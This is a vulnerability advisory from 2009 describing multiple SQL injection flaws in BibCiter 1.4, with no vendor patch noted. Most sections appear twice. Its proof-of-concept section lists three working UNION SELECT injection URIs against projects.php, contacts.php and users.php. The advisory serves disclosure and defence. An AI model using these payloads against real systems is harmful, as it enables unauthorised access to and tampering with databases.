BibCiter Multiple SQL Injection Vulnerabilities
BID:33329
Info
BibCiter Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 33329 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 16 2009 12:00AM |
| Updated: | Jan 19 2009 08:02PM |
| Credit: | nuclear |
| Vulnerable: |
BibCiter BibCiter 1.4 |
| Not Vulnerable: | |
Discussion
BibCiter Multiple SQL Injection Vulnerabilities
BibCiter is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
BibCiter 1.4 is vulnerable; other versions may also be affected.
BibCiter is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
BibCiter 1.4 is vulnerable; other versions may also be affected.
Exploit / POC
BibCiter Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/[path]/projects.php?idp=-721) UNION SELECT @@version%23
http://www.example.com/[path]/contacts.php?idc=-1) UNION SELECT @@version%23
http://www.example.com/[path]/users.php?idu=-1) UNION SELECT @@version%23
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/[path]/projects.php?idp=-721) UNION SELECT @@version%23
http://www.example.com/[path]/contacts.php?idc=-1) UNION SELECT @@version%23
http://www.example.com/[path]/users.php?idu=-1) UNION SELECT @@version%23
Solution / Fix
BibCiter Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].